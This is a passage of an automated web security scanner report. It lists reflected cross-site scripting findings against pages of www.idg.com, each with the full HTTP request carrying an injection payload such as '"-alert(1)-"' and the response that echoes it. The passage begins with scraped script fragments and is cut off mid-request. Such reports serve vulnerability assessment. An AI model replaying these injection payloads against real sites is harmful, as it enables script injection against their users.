amp;gs_sm\\x3de\\x26amp;gs_upl\\x3d10136l10136l0l10780l1l1l0l0l0l0l0l0ll0l0\\x26amp;bav\\x3don.2,or.r_gc.r_pw.\\x26amp;fp\\x3d1aed890c2a32d146\\x26amp;biw\\x3d1097\\x26amp;bih\\x3d869\\x26amp;tch\\x3d1226a4(a)7aefa97b5eb\\x26amp;ech\\x3d1\\x26amp;psi\\x3di314TveFCYOosALp7fyvDQ.1316537398329.3\x27)});});r();var l\x3d3N...Q\x27#\x27)):\x27#\x27;if(l\x3d\x3d\x27#\x27\x26\x26google.defre){google.defre\x3dC,~.*\x26\x26goog
...[SNIP]...

1.9. http://www.idg.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8da24"-alert(1)-"16f94643278 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?8da24"-alert(1)-"16f94643278=1 HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5095
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?8da24"-alert(1)-"16f94643278=1");
} catch(err) {}</script>
...[SNIP]...

1.10. http://www.idg.com/idgnetrssfeeds.nsf/html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /idgnetrssfeeds.nsf/html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c3e9"%3bc2cb7ec035e was submitted in the REST URL parameter 2. This input was echoed as 5c3e9";c2cb7ec035e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /idgnetrssfeeds.nsf/html5c3e9"%3bc2cb7ec035e?openpage HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:36 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5099
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html5c3e9";c2cb7ec035e?openpage");
} catch(err) {}</script>
...[SNIP]...

1.11. http://www.idg.com/idgnetrssfeeds.nsf/html [openpage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /idgnetrssfeeds.nsf/html

Issue detail

The value of the openpage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dcf8"-alert(1)-"feb0e19bfc5 was submitted in the openpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /idgnetrssfeeds.nsf/html?openpage9dcf8"-alert(1)-"feb0e19bfc5 HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:36 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5109
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html?openpage9dcf8"-alert(1)-"feb0e19bfc5");
} catch(err) {}</script>
...[SNIP]...

1.12. http://www.idg.com/www/homenew.nsf/DataRequestor.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b16"-alert(1)-"cbfee4bef4a was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/DataRequestor.js?OpenJavascriptLibrarye7b16"-alert(1)-"cbfee4bef4a HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5131
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js?OpenJavascriptLibrarye7b16"-alert(1)-"cbfee4bef4a");
} catch(err) {}</script>
...[SNIP]...

1.13. http://www.idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c8b1"%3bece23bae5f2 was submitted in the REST URL parameter 1. This input was echoed as 7c8b1";ece23bae5f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www7c8b1"%3bece23bae5f2/homenew.nsf/DataRequestor.js?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5121
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www7c8b1";ece23bae5f2/homenew.nsf/DataRequestor.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.14. http://www.idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/DataRequestor.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e6fc"%3b52ee92d580b was submitted in the REST URL parameter 3. This input was echoed as 2e6fc";52ee92d580b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/DataRequestor.js2e6fc"%3b52ee92d580b?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:38 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5121
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/DataRequestor.js2e6fc";52ee92d580b?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.15. http://www.idg.com/www/homenew.nsf/JSLib.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f59f"-alert(1)-"3db55aa5adb was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/JSLib.js?OpenJavascriptLibrary8f59f"-alert(1)-"3db55aa5adb HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:09 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5123
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js?OpenJavascriptLibrary8f59f"-alert(1)-"3db55aa5adb");
} catch(err) {}</script>
...[SNIP]...

1.16. http://www.idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbcfd"%3b1dc53ebbe69 was submitted in the REST URL parameter 1. This input was echoed as dbcfd";1dc53ebbe69 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwdbcfd"%3b1dc53ebbe69/homenew.nsf/JSLib.js?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:12 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5113
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwdbcfd";1dc53ebbe69/homenew.nsf/JSLib.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.17. http://www.idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/JSLib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73276"%3b57cc58e7814 was submitted in the REST URL parameter 3. This input was echoed as 73276";57cc58e7814 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/JSLib.js73276"%3b57cc58e7814?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:21 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5113
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/JSLib.js73276";57cc58e7814?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.18. http://www.idg.com/www/homenew.nsf/ajaxroutine.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2164"-alert(1)-"6776fc1ee4c was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/ajaxroutine.js?OpenJavascriptLibraryc2164"-alert(1)-"6776fc1ee4c HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:24 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5129
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.js?OpenJavascriptLibraryc2164"-alert(1)-"6776fc1ee4c");
} catch(err) {}</script>
...[SNIP]...

1.19. http://www.idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d08b"%3bb10e60c2210 was submitted in the REST URL parameter 1. This input was echoed as 4d08b";b10e60c2210 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www4d08b"%3bb10e60c2210/homenew.nsf/ajaxroutine.js?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:25 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5119
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www4d08b";b10e60c2210/homenew.nsf/ajaxroutine.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.20. http://www.idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53970"%3b3df099128fd was submitted in the REST URL parameter 3. This input was echoed as 53970";3df099128fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/ajaxroutine.js53970"%3b3df099128fd?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5119
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.js53970";3df099128fd?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.21. http://www.idg.com/www/homenew.nsf/core.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a222"-alert(1)-"49f5835726d was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/core.js?OpenJavascriptLibrary5a222"-alert(1)-"49f5835726d HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:21 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5122
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.js?OpenJavascriptLibrary5a222"-alert(1)-"49f5835726d");
} catch(err) {}</script>
...[SNIP]...

1.22. http://www.idg.com/www/homenew.nsf/core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5def2"%3bc173b3d5727 was submitted in the REST URL parameter 1. This input was echoed as 5def2";c173b3d5727 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www5def2"%3bc173b3d5727/homenew.nsf/core.js?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.idg.com/www/homenew.nsf/home?readform

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Mon, 19 Sep 2011 19:31:25 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5112
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www5def2";c173b3d5727/homenew.nsf/core.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

1.23. http://www.idg.com/www/homenew.nsf/core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f89a2"%3b0571f993f6e was submitted in the REST URL parameter 3. This input was echoed as f89a2";0571f993f6e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/core.jsf89a2"%3b0571f993f6e?OpenJavascriptLibrary HTTP/1.1
Host: www.idg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
